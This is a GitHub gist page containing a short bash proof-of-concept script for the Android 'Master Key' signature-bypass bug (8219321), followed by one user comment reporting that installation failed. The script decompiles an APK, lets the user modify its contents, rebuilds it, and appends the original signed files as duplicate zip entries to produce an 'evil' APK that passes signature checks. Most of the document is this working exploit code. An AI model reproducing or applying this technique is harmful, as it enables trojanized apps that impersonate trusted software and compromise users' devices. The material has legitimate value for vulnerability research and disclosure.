-
-
Save poliva/36b0795ab79ad6f14fd8 to your computer and use it in GitHub Desktop.
Quick & dirty PoC for Android bug 8219321 discovered by BlueboxSec
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/bin/bash | |
# PoC for Android bug 8219321 by @pof | |
# +info: https://jira.cyanogenmod.org/browse/CYAN-1602 | |
if [ -z $1 ]; then echo "Usage: $0 <file.apk>" ; exit 1 ; fi | |
APK=$1 | |
rm -r out out.apk tmp 2>/dev/null | |
java -jar apktool.jar d $APK out | |
#apktool d $APK out | |
echo "Modify files, when done type 'exit'" | |
cd out | |
bash | |
cd .. | |
java -jar apktool.jar b out out.apk | |
#apktool b out out.apk | |
mkdir tmp | |
cd tmp/ | |
unzip ../$APK | |
mv ../out.apk . | |
cat >poc.py <<-EOF | |
#!/usr/bin/python | |
import zipfile | |
import sys | |
z = zipfile.ZipFile(sys.argv[1], "a") | |
z.write(sys.argv[2]) | |
z.close() | |
EOF | |
chmod 755 poc.py | |
for f in `find . -type f |egrep -v "(poc.py|out.apk)"` ; do ./poc.py out.apk "$f" ; done | |
cp out.apk ../evil-$APK | |
cd .. | |
rm -rf tmp out | |
echo "Modified APK: evil-$APK" |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
I tried with script. And also, ive tried adding duplicate classes.dex alone in the APK and trying to install on device, but unable to install.
Failure [INSTALL_PARSE_FAILED_CERTIFICATE_ENCODING]
Even with the old android, versions. Any idea on what am i missing?